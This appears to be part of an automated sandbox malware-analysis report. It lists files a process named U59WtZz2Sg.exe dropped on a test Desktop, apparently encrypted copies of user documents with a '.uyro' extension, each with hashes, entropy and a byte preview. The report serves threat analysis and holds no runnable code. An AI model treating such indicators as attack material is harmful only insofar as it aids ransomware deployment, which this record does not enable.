Entropy (8bit):	7.831156132257157
Encrypted:	false
SSDEEP:	24:mOx/gHmLONmK9wf5tg1iipb8gR7lClDg3u2gQb9zWpPo0DySSGbD:z/gHLN4frg1Bb8gRp9eob9SpPTSUD
MD5:	A1F7B366ED1888A5FCB0CD1E201F9675
SHA1:	85437B88DCA6641CC3A0C1C81F538E22E1B73582
SHA-256:	209784479EA5694294ECEF26BAC0B9D391C7B0DD79EAB464C1E62E7EA064EA3C
SHA-512:	E739E11E885082170FD609F1D9EE32670FBC878F66833BB9EEC093830342AA5EB84927FD0C3402A413D1D5A36152AE375ADC230BD706E40FA6D5361D1AD55146
Malicious:	false
Reputation:	unknown
Preview:	BPMLN..(i...CB..#.\|h_.IN..z...(.@uh....0.Oc.X0Wx.Z;.]%J.CO.......bse..%}..r...m.E..:nA0o..5>jp...p.....q...$x...q/e.^../..I.l..:.$._.R..G...^.:..9..~..mc..._...w.9~[......f..D?.+.2...O..(..%..~.p..iaGSm2.n.....\|#N.........!..c.........G0R...].)......E...\|.t.w...H.R...._R-..x..<....WK..RR.rY.:.....E.iC.^Am#....=........u....>=G~ZhL..S...i.?..z.......+..^../;.N.q}.u.d2"aU.mR?...PDep.U....Q....a.hOsq..W...xG..4....;.....gx.>.&.l...Hn..Jh...]$...Y...h.Y..%..oSF.t.Q..2...ez..v.a)."..`^.%:..$p..+.....Z.=.Ju..'%..:.n.U...A...6.z...9$..5../.[><._I.rV7.......(.G. ....~..O.E.....}...oB3...h.a..O...z..\|.....{.1...R6.?...h_... /.......>.X......gHMp.7{K.-v]..[o{KYc.........A...9......A.\|.......hA.ZH.>{.........w:.. ....>]B=.K).....R........#0..BgLM..f.e..J..Jzb.k.....Q.........,..0.)Y].s.......]O.>....!...Xn...7m....[..t...({..5R5#Y%t.oAKS......P......o'[.^T9..^x4..hon.]M..Ub..R..+...L2g].K'(.......6..l.o.LI.OM,....y..C...'...`.Y,(Aw.N...

C:\Users\user\Desktop\BPMLNOBVSB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832010562664738
Encrypted:	false
SSDEEP:	24:sWlmY7Zg6i39aF7HhVmDFnfTkcldwLfN5m9bUPOx9Y8ZG0VZg0xTbD:s07Zg6i3MFtVmhndwLfNybUPidZG0ACD
MD5:	87ED1FA25A66A18C5DD7C73386430CE9
SHA1:	65F10FC68D00182A4BC9806F202084556825E0DD
SHA-256:	A220F32B09D2A81537A5052878E2DDE380D7707B38E9F0826FDC830DCC1BB830
SHA-512:	2DF3CD9E31E95743FA3AEEA1010C2F37F916D3D616FEF4B30EE292E65C8A4342CA3BD9EC5346AEAAAAA3DE8A3296F7CB2C43E5F41485BB89C61676572B93300F
Malicious:	false
Reputation:	unknown
Preview:	BPMLN .R.n.5s.".h...$.....^.......ZN.t.$Q=...=f...D...f.6....;<$.q"...Dq....`.w%..Mt..n#..#^.5..Z....Jw.0...........R.1....U..`U@s5...-...K...vz...".3.?..1..I..@.9OB.[]..X....F8=.j.@U;..~!.g4p.q?.K.....-..._4.X.y.F7...x.p..N+..`J._..R.J3......".....Uz.`.3..z......t?.2..<..#.H..D,....\|....T..).Q..".{.R....j..r...3@...'MF.....p...j,.U.S...CCS.O...^...X..4.e..h...w.,..h.tb...s..........K.z#.......-M.k}I@....+\|..o..U..{...s.]...9.dJ?..x.b..:.....#4.P.t.....S....&t...Z..&K....,x..2.%\..Vt...u.=.6.RrP....i..L.7_..`..c.cR..'*(.....,........$.t..4?..vL......G@.T.R..&..6.x.2T.B....}.O$..r...e(.uG.w..id.D.....z.vc..0.y..V.X....2.v0o...Ke_.`...(...(....`Tt+J..`.~.......i..l..Q.F....c5{..5..1.Y }.$....z..U.(.Hu.....w-.i.nh.h\|]......._.o..$..[_.N....@..b.hra...t..\.i..$8.&.M..3...x.dPv...z.9<}.97...3..i\|..uL.........LmSF..3...f...F.E...T.Q.....!..kZ......r!.<YF.sS.J..m-ni.b.7Vh.r.u.e.5. ......Vb)Q.'..h.....z...V9{..4....S,.Pc....\|... 4..?.n.<.\|..

C:\Users\user\Desktop\BPMLNOBVSB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832010562664738
Encrypted:	false
SSDEEP:	24:sWlmY7Zg6i39aF7HhVmDFnfTkcldwLfN5m9bUPOx9Y8ZG0VZg0xTbD:s07Zg6i3MFtVmhndwLfNybUPidZG0ACD
MD5:	87ED1FA25A66A18C5DD7C73386430CE9
SHA1:	65F10FC68D00182A4BC9806F202084556825E0DD
SHA-256:	A220F32B09D2A81537A5052878E2DDE380D7707B38E9F0826FDC830DCC1BB830
SHA-512:	2DF3CD9E31E95743FA3AEEA1010C2F37F916D3D616FEF4B30EE292E65C8A4342CA3BD9EC5346AEAAAAA3DE8A3296F7CB2C43E5F41485BB89C61676572B93300F
Malicious:	false
Reputation:	unknown
Preview:	BPMLN .R.n.5s.".h...$.....^.......ZN.t.$Q=...=f...D...f.6....;<$.q"...Dq....`.w%..Mt..n#..#^.5..Z....Jw.0...........R.1....U..`U@s5...-...K...vz...".3.?..1..I..@.9OB.[]..X....F8=.j.@U;..~!.g4p.q?.K.....-..._4.X.y.F7...x.p..N+..`J._..R.J3......".....Uz.`.3..z......t?.2..<..#.H..D,....\|....T..).Q..".{.R....j..r...3@...'MF.....p...j,.U.S...CCS.O...^...X..4.e..h...w.,..h.tb...s..........K.z#.......-M.k}I@....+\|..o..U..{...s.]...9.dJ?..x.b..:.....#4.P.t.....S....&t...Z..&K....,x..2.%\..Vt...u.=.6.RrP....i..L.7_..`..c.cR..'*(.....,........$.t..4?..vL......G@.T.R..&..6.x.2T.B....}.O$..r...e(.uG.w..id.D.....z.vc..0.y..V.X....2.v0o...Ke_.`...(...(....`Tt+J..`.~.......i..l..Q.F....c5{..5..1.Y }.$....z..U.(.Hu.....w-.i.nh.h\|]......._.o..$..[_.N....@..b.hra...t..\.i..$8.&.M..3...x.dPv...z.9<}.97...3..i\|..uL.........LmSF..3...f...F.E...T.Q.....!..kZ......r!.<YF.sS.J..m-ni.b.7Vh.r.u.e.5. ......Vb)Q.'..h.....z...V9{..4....S,.Pc....\|... 4..?.n.<.\|..

C:\Users\user\Desktop\FENIVHOIKN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840117332632234
Encrypted:	false
SSDEEP:	24:sScya4D94/NBw2tJl0nRlQp78NDL2hetByu/Z483bw10CCYaqyolsGpbD:55ygcSLjp4oMPaqyGssD
MD5:	D4B498AB44868AA345C3136F4674A1EB
SHA1:	4B89BAA377F046A8769474F1B1A068CB2AE4C274
SHA-256:	4101315ABE293AD6194953A0401F93E5A23E1EE1FBBC614185B3D1DC1C14A220
SHA-512:	36C44238468584E21FD39CF7E92D52B62F92EBD80A43B712D3539EE82EA94DAACE5E5656DF7C42107A4B72C63665B13D3954AB374D8780F99DD9146BACA90621
Malicious:	false
Reputation:	unknown
Preview:	FENIV`.2..sY.5.....5U....]...r...B....3t..@n..].....pU....$.p..C.\...]..W.........c.....Qt.q.b\|....%L.&.W7.....k...o.$(.c......Aj...p3..W.EZ.2..2..l........J....[.VW..e.I.U.{...%u..........F.}...g9H.1.V ...k."..Er.........v...k..Ssm....e3.......'j....8B."G.).t......rU..r.9....I5...4.[...r.F.%...b..xq..hH...."C...i.S.....(X.].Gp.;d0..`.9.Zn..>.-.h...`Pe1.e......_...a...=.P.).UA.v-.....q....?.....!.......>.[.1`.....M..>.m.v\|H3t8.A.,r./ra)u.O.......Z[MY..jt..EX.e.....h.A.CJ.H..\...ta&...2z.`..._...t...^.KL.8..U......\..........^e0a.V..."...........#Bu,.5....J..Y...}..l..L.u.4..ASu.....OX...W....\|...U.v....`f).r./..a.......m$..z..%Y.;3....;...4.X..BQ.>!......K.......'.AxG....D.Id.C...<.9..c.,....h...}Sa..E...8.)./j-...J}Pt....K.......k..E.....T..0,..C.`*....N..--.~..WL.....%qZ...{.J]}."..hYe\.s.!..5.Viv...F.{..{Qt-f..h.dp.(...&q.2F.;7.......A..........gf...^'....GZ..Y.....O........@.~.YM.s.!U..G>QGC.H 5.B.\|_/.D>.78.1...].$.=...Jck:ksY

C:\Users\user\Desktop\FENIVHOIKN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840117332632234
Encrypted:	false
SSDEEP:	24:sScya4D94/NBw2tJl0nRlQp78NDL2hetByu/Z483bw10CCYaqyolsGpbD:55ygcSLjp4oMPaqyGssD
MD5:	D4B498AB44868AA345C3136F4674A1EB
SHA1:	4B89BAA377F046A8769474F1B1A068CB2AE4C274
SHA-256:	4101315ABE293AD6194953A0401F93E5A23E1EE1FBBC614185B3D1DC1C14A220
SHA-512:	36C44238468584E21FD39CF7E92D52B62F92EBD80A43B712D3539EE82EA94DAACE5E5656DF7C42107A4B72C63665B13D3954AB374D8780F99DD9146BACA90621
Malicious:	false
Reputation:	unknown
Preview:	FENIV`.2..sY.5.....5U....]...r...B....3t..@n..].....pU....$.p..C.\...]..W.........c.....Qt.q.b\|....%L.&.W7.....k...o.$(.c......Aj...p3..W.EZ.2..2..l........J....[.VW..e.I.U.{...%u..........F.}...g9H.1.V ...k."..Er.........v...k..Ssm....e3.......'j....8B."G.).t......rU..r.9....I5...4.[...r.F.%...b..xq..hH...."C...i.S.....(X.].Gp.;d0..`.9.Zn..>.-.h...`Pe1.e......_...a...=.P.).UA.v-.....q....?.....!.......>.[.1`.....M..>.m.v\|H3t8.A.,r./ra)u.O.......Z[MY..jt..EX.e.....h.A.CJ.H..\...ta&...2z.`..._...t...^.KL.8..U......\..........^e0a.V..."...........#Bu,.5....J..Y...}..l..L.u.4..ASu.....OX...W....\|...U.v....`f).r./..a.......m$..z..%Y.;3....;...4.X..BQ.>!......K.......'.AxG....D.Id.C...<.9..c.,....h...}Sa..E...8.)./j-...J}Pt....K.......k..E.....T..0,..C.`*....N..--.~..WL.....%qZ...{.J]}."..hYe\.s.!..5.Viv...F.{..{Qt-f..h.dp.(...&q.2F.;7.......A..........gf...^'....GZ..Y.....O........@.~.YM.s.!U..G>QGC.H 5.B.\|_/.D>.78.1...].$.=...Jck:ksY

C:\Users\user\Desktop\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849238931969949
Encrypted:	false
SSDEEP:	24:kSvxvwkwThE/mZ/zQwyXmJRMSPV/pF21uGu3V7W5nO8hfR0OJubD:kExvwkwTueZ/zQwy2JRnRFwuGGV783TG
MD5:	58C1B0F3F8992E2158B5FF0D5761084D
SHA1:	4E4B6D4103D412E4AB7FED0C0C4FCBCF5B0F2970
SHA-256:	4E57D3DAB30BDAEA03F6FBD9C07B10D482B10A303F258E726A46439F4E1E26EA
SHA-512:	CDF418AD27E3CADC3C8A92A8532B516ED4406B65EDA42656CF7366DE2AEAA4E2EBADFCC1042125526F123A1BECA25C65E378E0B95C80E87DA11A8F0E80B16C17
Malicious:	false
Reputation:	unknown
Preview:	JSDNG.V.Z.....Q...3W.q.../p.<.Ed.....biO.1s..A....#.q.4..GlW..+GH..;.../.)v.J........&..!3...'..Z.(..z.b$..P.......'.B.f....&.WI...-K.f .m.vb.......Xg.;.......!./.Q...........d7....ui.^h.....pj.)....D...W.L....rCe/_D...Lx...6.M..../....L:...z.:).hP_.Y\|.....v..'._u.T....\|+..\|\|.d...&\g...3.s=....&.L9......8....WYo..OU.@...&.]k.pt......e..3%OgU`.u..=..\`.'......!...!F.T(w.F$..e.y..xD.kg...........Z...i...$y\R..m...a.%.IV.r.....O4G...=....{..e>.o.......J.........6."7......_.......S.\|..d.b.-..2.XoGa..;....YJ....QS.TF......k...].W.M)'..Xx..K2..EmBm..=.._..s..\.i...$.fj....\....9V..XN.c..P...W%.g.U.mq\|.V....iVt.H...'.n..'.U..$eh......cr.-....F.r.R}.....0O.&.;.7\|[Xs@...N?_.{2&Y..A3..8.'.X......G...`....$....'.".....V......7....E.\|)".i.....Sm..Z.%H.....c.....i.xS.Sj.i.z....Q$;...!Wl.o..S2.G.e)c.n......,/....;ptx.u..C../`T.C..g.J.S.S.2-1..Z..h.`.U.........x.....d.........7[.2...o). ..@.._ ?...#.....J.0m..,.:a$.b..(.{..j.P.........-.f.DT.q.If.......#f..4y0

C:\Users\user\Desktop\JSDNGYCOWY.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849238931969949
Encrypted:	false
SSDEEP:	24:kSvxvwkwThE/mZ/zQwyXmJRMSPV/pF21uGu3V7W5nO8hfR0OJubD:kExvwkwTueZ/zQwy2JRnRFwuGGV783TG
MD5:	58C1B0F3F8992E2158B5FF0D5761084D
SHA1:	4E4B6D4103D412E4AB7FED0C0C4FCBCF5B0F2970
SHA-256:	4E57D3DAB30BDAEA03F6FBD9C07B10D482B10A303F258E726A46439F4E1E26EA
SHA-512:	CDF418AD27E3CADC3C8A92A8532B516ED4406B65EDA42656CF7366DE2AEAA4E2EBADFCC1042125526F123A1BECA25C65E378E0B95C80E87DA11A8F0E80B16C17
Malicious:	false
Reputation:	unknown
Preview:	JSDNG.V.Z.....Q...3W.q.../p.<.Ed.....biO.1s..A....#.q.4..GlW..+GH..;.../.)v.J........&..!3...'..Z.(..z.b$..P.......'.B.f....&.WI...-K.f .m.vb.......Xg.;.......!./.Q...........d7....ui.^h.....pj.)....D...W.L....rCe/_D...Lx...6.M..../....L:...z.:).hP_.Y\|.....v..'._u.T....\|+..\|\|.d...&\g...3.s=....&.L9......8....WYo..OU.@...&.]k.pt......e..3%OgU`.u..=..\`.'......!...!F.T(w.F$..e.y..xD.kg...........Z...i...$y\R..m...a.%.IV.r.....O4G...=....{..e>.o.......J.........6."7......_.......S.\|..d.b.-..2.XoGa..;....YJ....QS.TF......k...].W.M)'..Xx..K2..EmBm..=.._..s..\.i...$.fj....\....9V..XN.c..P...W%.g.U.mq\|.V....iVt.H...'.n..'.U..$eh......cr.-....F.r.R}.....0O.&.;.7\|[Xs@...N?_.{2&Y..A3..8.'.X......G...`....$....'.".....V......7....E.\|)".i.....Sm..Z.%H.....c.....i.xS.Sj.i.z....Q$;...!Wl.o..S2.G.e)c.n......,/....;ptx.u..C../`T.C..g.J.S.S.2-1..Z..h.`.U.........x.....d.........7[.2...o). ..@.._ ?...#.....J.0m..,.:a$.b..(.{..j.P.........-.f.DT.q.If.......#f..4y0

C:\Users\user\Desktop\KZWFNRXYKI.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839364088911315
Encrypted:	false
SSDEEP:	24:3YkLgWGyrGWj6ZtuC/rEU8TPv4ky91BWi/1jpsfBnhh8fOpf4vkuDL4Q0ILbN0tX:3BRGyrGYVU8TPgkk1BhFif4vkun4Q0qo
MD5:	6BCB6B0894BBE645B0847D1BBE9735D4
SHA1:	15207CEE0221A2EAB6D1C7A1F7861FA3359659FB
SHA-256:	53C227036A3E5171B03E9FCF5B06D1002A74599649F107415A4AA51ABCBAD248
SHA-512:	7841704A7A918FE72588526DC7BC4608301ABAC76BFA7C8E315BBA3CAB994AF37070F8148AD2BFF6BE2E68F1ADFCB3B7ED336F81129F500C0BC5EF0CD48B9AEE
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.....<.WV....r.]N}".\|......z>....E=5.8.x.N..Tu..a.;L..n...Z.....T3.KnPC..l.MG..=i.. 3.......!.?.8.<g..U......;D.......o\......s..~.p...a.P....M.....yeE....s.wT....M...[.2.....;z}.Fy.g..N.....W..iDP...WaZ..Y..{sv4........^...C.-.btG.P..a.....lL;A....[;.....^P.......).}..}...!.[...+.'g.....g..1..P..{.67...?3...`.)\...1........o..&^........3....JY.o..k.H....%O.7.S=.^.....}V..o.m.%...m.2.3s..eL.z~......N,....=..-....UC...,#y.(.0.K.I.4.u.}....!].vB.r...xY....87.!.U...1/.....>(..S.7....JH....:.M.H"...E...5..2..M..u..r.....~..j.f.,.....Jl...._.......7.a.......'q..w......(.aH.....7U;QS...".e.\.".....Y.-.M..v../..UN.+.Z..[.DB........L\|)QR.....D..J.&.Iq.9.c.7..'...P.S....q...T.:..S...U8..,0....fm..y.C.;.c..G.I..}yw..6..Xlo.[..a.2....1rBE...2..'h....fZ...br...}.q..z{.u...A#s..#.6UyD..j*?..\..2.7a.".x.aV.!.q2...oA...3,?..d.+.....H3b...D......sDt9..D..R..,l........'.........,.k.;d...W1."..Y'..K..6...0U.Sn....rJ3.t.e.q..I..../&.~..r.T....'.".

C:\Users\user\Desktop\KZWFNRXYKI.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839364088911315
Encrypted:	false
SSDEEP:	24:3YkLgWGyrGWj6ZtuC/rEU8TPv4ky91BWi/1jpsfBnhh8fOpf4vkuDL4Q0ILbN0tX:3BRGyrGYVU8TPgkk1BhFif4vkun4Q0qo
MD5:	6BCB6B0894BBE645B0847D1BBE9735D4
SHA1:	15207CEE0221A2EAB6D1C7A1F7861FA3359659FB
SHA-256:	53C227036A3E5171B03E9FCF5B06D1002A74599649F107415A4AA51ABCBAD248
SHA-512:	7841704A7A918FE72588526DC7BC4608301ABAC76BFA7C8E315BBA3CAB994AF37070F8148AD2BFF6BE2E68F1ADFCB3B7ED336F81129F500C0BC5EF0CD48B9AEE
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.....<.WV....r.]N}".\|......z>....E=5.8.x.N..Tu..a.;L..n...Z.....T3.KnPC..l.MG..=i.. 3.......!.?.8.<g..U......;D.......o\......s..~.p...a.P....M.....yeE....s.wT....M...[.2.....;z}.Fy.g..N.....W..iDP...WaZ..Y..{sv4........^...C.-.btG.P..a.....lL;A....[;.....^P.......).}..}...!.[...+.'g.....g..1..P..{.67...?3...`.)\...1........o..&^........3....JY.o..k.H....%O.7.S=.^.....}V..o.m.%...m.2.3s..eL.z~......N,....=..-....UC...,#y.(.0.K.I.4.u.}....!].vB.r...xY....87.!.U...1/.....>(..S.7....JH....:.M.H"...E...5..2..M..u..r.....~..j.f.,.....Jl...._.......7.a.......'q..w......(.aH.....7U;QS...".e.\.".....Y.-.M..v../..UN.+.Z..[.DB........L\|)QR.....D..J.&.Iq.9.c.7..'...P.S....q...T.:..S...U8..,0....fm..y.C.;.c..G.I..}yw..6..Xlo.[..a.2....1rBE...2..'h....fZ...br...}.q..z{.u...A#s..#.6UyD..j*?..\..2.7a.".x.aV.!.q2...oA...3,?..d.+.....H3b...D......sDt9..D..R..,l........'.........,.k.;d...W1."..Y'..K..6...0U.Sn....rJ3.t.e.q..I..../&.~..r.T....'.".

C:\Users\user\Desktop\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852799677978721
Encrypted:	false
SSDEEP:	24:C2oW2YI1H8phaS8zTDQvr87yS5iQpxsviMvUXiM9qeA6VsaRMKXUbD:bobVF8pykO5iSiM9Z/X2KuD
MD5:	CA8F935B2A804547D18488C1B7CB3B35
SHA1:	C226B2B73E3C846F50F66B918E629FD7B28985C7
SHA-256:	D92058FBA77B815B09F60A380493B3F349452CCC3E547F8FD4BE7F56C32272E8
SHA-512:	CBFD9F2412FA726056BED8DF01119759FAED27B6EE5334FECE65BAEF5952CAECAA11379B3E9FEA52FEC7C3CB6F3E1AAA47139A17B3C78BA0C41C0E410FE71DF4
Malicious:	false
Reputation:	unknown
Preview:	KZWFN..G.y..E....,..e.GVkOk...~..r.=..3R..s.4M.;5.....QIS....x...^-HX...........+...e.9.F5@GF.....)o6..'\1.F..R..,n..$A.(...e.N3E....aoC ....[..N\|W.a.c.Z...b..0:..188Ag.i..x.(t:.t.C.E..G.=.:...4.r*..Lq......i..{..Q..u\.!..`...p.$....?.].F...K..u7..2.....(..k.....A.~3.c.c....nJ.6P...392.k.u.$......h_i.....].r.kQ.mM(..>...e.\.......S..q..2C%........qsF..]....%-[,H.....QuSu0.if..p..7ke....".IT.k.VJ>#..N.w.?.:.M.\|...G.W..hVP\I.z!..[..K.........D.vd..........(.,G..%..g...,[n!../.w.S.-.].....=q.d?....E.e...}...U.!........"..fj..)b-.].m.8.....L[b...t...D"...#.3.(\|.....2#.....XO.v\|..6...0V..h..g.....h._.w.L.Q.v>Y.m..L.x.....L....],.0.}h.k.p...1..P.^L.....:ca..._~...{)........Ka...t..-...m..Ew.VT4;E`5......f.3T.1...J.....1.'..29..k6./.Z}..3...J.Zb$......`.....jM}t...R.C..xhVCTl....pGRH.V.S.....[.........DQH.~.....;6.V.B.\|AK0.,......+....q.`......>F..$`N....@..h6!:..3W... ;0.>f.YP....W`"o..jH.....neq.:.0.q...[..G.f.a\.....g.t..<...j..=.=r....t.?......

C:\Users\user\Desktop\KZWFNRXYKI.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852799677978721
Encrypted:	false
SSDEEP:	24:C2oW2YI1H8phaS8zTDQvr87yS5iQpxsviMvUXiM9qeA6VsaRMKXUbD:bobVF8pykO5iSiM9Z/X2KuD
MD5:	CA8F935B2A804547D18488C1B7CB3B35
SHA1:	C226B2B73E3C846F50F66B918E629FD7B28985C7
SHA-256:	D92058FBA77B815B09F60A380493B3F349452CCC3E547F8FD4BE7F56C32272E8
SHA-512:	CBFD9F2412FA726056BED8DF01119759FAED27B6EE5334FECE65BAEF5952CAECAA11379B3E9FEA52FEC7C3CB6F3E1AAA47139A17B3C78BA0C41C0E410FE71DF4
Malicious:	false
Reputation:	unknown
Preview:	KZWFN..G.y..E....,..e.GVkOk...~..r.=..3R..s.4M.;5.....QIS....x...^-HX...........+...e.9.F5@GF.....)o6..'\1.F..R..,n..$A.(...e.N3E....aoC ....[..N\|W.a.c.Z...b..0:..188Ag.i..x.(t:.t.C.E..G.=.:...4.r*..Lq......i..{..Q..u\.!..`...p.$....?.].F...K..u7..2.....(..k.....A.~3.c.c....nJ.6P...392.k.u.$......h_i.....].r.kQ.mM(..>...e.\.......S..q..2C%........qsF..]....%-[,H.....QuSu0.if..p..7ke....".IT.k.VJ>#..N.w.?.:.M.\|...G.W..hVP\I.z!..[..K.........D.vd..........(.,G..%..g...,[n!../.w.S.-.].....=q.d?....E.e...}...U.!........"..fj..)b-.].m.8.....L[b...t...D"...#.3.(\|.....2#.....XO.v\|..6...0V..h..g.....h._.w.L.Q.v>Y.m..L.x.....L....],.0.}h.k.p...1..P.^L.....:ca..._~...{)........Ka...t..-...m..Ew.VT4;E`5......f.3T.1...J.....1.'..29..k6./.Z}..3...J.Zb$......`.....jM}t...R.C..xhVCTl....pGRH.V.S.....[.........DQH.~.....;6.V.B.\|AK0.,......+....q.`......>F..$`N....@..h6!:..3W... ;0.>f.YP....W`"o..jH.....neq.:.0.q...[..G.f.a\.....g.t..<...j..=.=r....t.?......

C:\Users\user\Desktop\KZWFNRXYKI.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834143612063669
Encrypted:	false
SSDEEP:	24:4GRT36IHAOhp/L6ZCixV3zFRSmyXrzrHIcUoCpB9Du+E3R6vTjIj9IM7fbD:2IHAOhJL4nxSXXrH25v9VMMIj7/D
MD5:	59DB8F3C244B9DE270B29418B119EA2F
SHA1:	976FFDBBD51FFBE874DCDA245F0FF81CDECDEB10
SHA-256:	60482BE5E14BE03383EF37A9B9EF09B3BDC30539B7300FB86A620C223EDBE001
SHA-512:	96AC1FE0FF2096EE5BC5CD50A645DE665072ACC7B1349378F62BF74B9A1183D7C480F3F9A5E906E98C6FF7FD4807F79D9E7B2D57714D09F15474050675D1184E
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.`..\|.@.d."..8..n..UQbU....].x...~.~.h.F...t.d.....C..q-.+R5....5.Y....qX.c....q...Zx.x...b...q.7w.]m..9...7......X."..&z...G..,Jq.i2...:...\x......&.k..R..mB'..N..)...'Y.@f.DRQ.SP@.....`eX.....B..S..4.I3..Z...l..........;'t.a]..v...k.&.&.WQw=..bx'...G...N.R5.S....'.......F.H!.L...1.K...K..W..Y.L.F...b._#{.e...._)..';p..M!DQ.._".Th......k9:.....t'.B..9p0..J.S..f.6...(.4.\|...4..Q.....".>..)...+J..}.}WD\..5..AD..\|Cd.u....{=....{)5y...(..j.x.......H..3../._....h\|.E.....hF.....T&w.<..........f...M.^..Ez.mH....8B.6.zu....d..&u...R.Z4...K...nn{..^....GY....Ys.....8bnS.cI...y&.tA6Ta..-@u..S\{......Z<.._r;...A...D..9U.+R8`N.Z....y..0....1Ddto[....n....+a...JH.u.........e...`.j..C.\|..J.q.......$.+Q....g.h.e2.c..fK..H.8...ml.\|.c$.-x.......].w.!..~.>J).......r;...jI.j.....%m..m-.8.. ..]........P.w...,..Z..X...9^Z...8eM..Q.lh.....t.'k@-T.<.........{.....h.+.9.......`..r,._\.rh.HMU.;......8......D.]..\|Dx.....Z.?S&.^-."q.3F\-....3p.w..\v.8!..

C:\Users\user\Desktop\KZWFNRXYKI.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834143612063669
Encrypted:	false
SSDEEP:	24:4GRT36IHAOhp/L6ZCixV3zFRSmyXrzrHIcUoCpB9Du+E3R6vTjIj9IM7fbD:2IHAOhJL4nxSXXrH25v9VMMIj7/D
MD5:	59DB8F3C244B9DE270B29418B119EA2F
SHA1:	976FFDBBD51FFBE874DCDA245F0FF81CDECDEB10
SHA-256:	60482BE5E14BE03383EF37A9B9EF09B3BDC30539B7300FB86A620C223EDBE001
SHA-512:	96AC1FE0FF2096EE5BC5CD50A645DE665072ACC7B1349378F62BF74B9A1183D7C480F3F9A5E906E98C6FF7FD4807F79D9E7B2D57714D09F15474050675D1184E
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.`..\|.@.d."..8..n..UQbU....].x...~.~.h.F...t.d.....C..q-.+R5....5.Y....qX.c....q...Zx.x...b...q.7w.]m..9...7......X."..&z...G..,Jq.i2...:...\x......&.k..R..mB'..N..)...'Y.@f.DRQ.SP@.....`eX.....B..S..4.I3..Z...l..........;'t.a]..v...k.&.&.WQw=..bx'...G...N.R5.S....'.......F.H!.L...1.K...K..W..Y.L.F...b._#{.e...._)..';p..M!DQ.._".Th......k9:.....t'.B..9p0..J.S..f.6...(.4.\|...4..Q.....".>..)...+J..}.}WD\..5..AD..\|Cd.u....{=....{)5y...(..j.x.......H..3../._....h\|.E.....hF.....T&w.<..........f...M.^..Ez.mH....8B.6.zu....d..&u...R.Z4...K...nn{..^....GY....Ys.....8bnS.cI...y&.tA6Ta..-@u..S\{......Z<.._r;...A...D..9U.+R8`N.Z....y..0....1Ddto[....n....+a...JH.u.........e...`.j..C.\|..J.q.......$.+Q....g.h.e2.c..fK..H.8...ml.\|.c$.-x.......].w.!..~.>J).......r;...jI.j.....%m..m-.8.. ..]........P.w...,..Z..X...9^Z...8eM..Q.lh.....t.'k@-T.<.........{.....h.+.9.......`..r,._\.rh.HMU.;......8......D.]..\|Dx.....Z.?S&.^-."q.3F\-....3p.w..\v.8!..

C:\Users\user\Desktop\KZWFNRXYKI\BPMLNOBVSB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825330887979709
Encrypted:	false
SSDEEP:	24:j0jwqLwLf6YajFbaSge9FP1h7heq8+iZyszvfoGDx3dguwVV2vezGx+QtNZbD:jawqLBhbaSlHv7v8R4aAq3d4VD6bnD
MD5:	00FA3367C7970B1B91DDACBA39556348
SHA1:	A03A4F8A720A05C7A0F0DA9A22B799D704DC79CB
SHA-256:	99968D02F2C95057906215B592B7C466F3E3D21B780E80F63C463C157E0D1C49
SHA-512:	F9B36F801B6CC82301F401482337CD15513CCA2194A1E536E2D33B9365ACCB69D912E5D92456E085B9802D7C08DCA333D45EE756A440804680ECA2B541DCBD5B
Malicious:	false
Reputation:	unknown
Preview:	BPMLN.@&h.@.k....uB.n......`.b.A.g.`.......m.,../.A..8LS./.B...W..?T.l. ..4..w@RN.-?o::...P.....T.X..`..0..G..I/.G...qB".<}.r...8..."eM.?.....8.............4>..AzE.._^+.Hzt....J..K;3.6..>.,.....\|..5.5..r.xPZ.cc.p.....L^..A......W...Y..a.e.J....R.vqQ...p064I..Gj..K..U.K.....f.X..n.})4...X.......,..G^n....B....dS..&.......2..IB./.Q:3..1y...X..s...=......f.Kxe.?...<.Yl..%....@T.....h....p.....f.h_,.Q?...d(....K..O......m...E.4#O_Up.....%y......z.-...?...4&.....W...5.....$._....@..#./..~_w...S.y..uS.....SwL....rl.@....W..\.T....i..7.p.....-...X..-......V.}.]...g.5B,...].tP.RS.Z.m;."QN...J..S.....Z.B[.O.....z....oSD..0Z.:...l....P.x../...M/...I>.......{...\|..5..D...!_[..A8x..0?..zg.S............@=y.0...'S..Ax....H..*[.;}. 